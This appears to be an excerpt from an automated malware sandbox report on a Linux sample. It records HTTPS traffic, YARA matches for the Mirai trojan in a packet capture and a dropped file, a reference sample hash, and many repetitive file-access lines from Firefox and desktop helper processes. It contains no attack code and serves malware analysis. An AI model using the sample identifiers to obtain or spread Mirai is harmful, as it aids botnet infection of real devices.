          Source: unknownNetwork traffic detected: HTTP traffic on port 40914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
          Source: unknownNetwork traffic detected: HTTP traffic on port 40916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39314
          Source: unknownNetwork traffic detected: HTTP traffic on port 36564 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36564
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36558
          Source: unknownNetwork traffic detected: HTTP traffic on port 39314 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40914
          Source: unknownNetwork traffic detected: HTTP traffic on port 40906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40896

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
          Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
          Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
          Source: /tmp/mgmP_SRg.zip.part, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
          Source: /tmp/mgmP_SRg.zip.part, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
          Source: /tmp/mgmP_SRg.zip.part, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
          Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
          Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
          Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
          Source: /tmp/mgmP_SRg.zip.part, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
          Source: /tmp/mgmP_SRg.zip.part, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
          Source: /tmp/mgmP_SRg.zip.part, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
          Source: classification engineClassification label: mal96.troj.lin@0/44@31/0
          Source: /usr/bin/exo-open (PID: 6239)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
          Source: /usr/bin/exo-open (PID: 6239)Directory: /home/saturnino/.cacheJump to behavior
          Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6243)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
          Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6243)Directory: /home/saturnino/.cacheJump to behavior
          Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6243)Directory: /home/saturnino/.localJump to behavior
          Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6243)Directory: /home/saturnino/.configJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)File: /tmp/firefox/.parentlockJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)File: /home/saturnino/.mozilla/firefox/a3xevaya.default-release/.parentlockJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)File: /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/.startup-incompleteJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /home/saturnino/.fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/X11/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lato/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/liberation/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/liberation2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-assamese/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-bengali/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-kannada/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-oriya/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-tamil/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/lohit-telugu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/openoffice/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/padauk/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/pagul/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/samyak/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/samyak-fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/sinhala/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/tibetan-machine/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/tlwg/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/truetype/ubuntu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/type1/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/share/fonts/X11/encodings/large/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)File: /usr/lib/firefox/fonts/.uuid.TMP-LWLkmnJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /usr/lib/firefox/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /home/saturnino/.mime.typesJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /home/saturnino/.mozilla/firefox/a3xevaya.default-release/storage/permanent/chrome/.metadata-v2Jump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /home/saturnino/.mailcapJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Directory: /home/saturnino/.cacheJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6249)Directory: /home/saturnino/.drircJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /home/saturnino/.fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/X11/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lato/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/liberation/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/liberation2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-assamese/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-bengali/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-kannada/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-oriya/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-tamil/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/lohit-telugu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/openoffice/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/padauk/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/pagul/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/samyak/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/samyak-fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/sinhala/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/tibetan-machine/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/tlwg/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/truetype/ubuntu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/type1/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Directory: /usr/share/fonts/X11/encodings/large/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /home/saturnino/.fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/X11/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
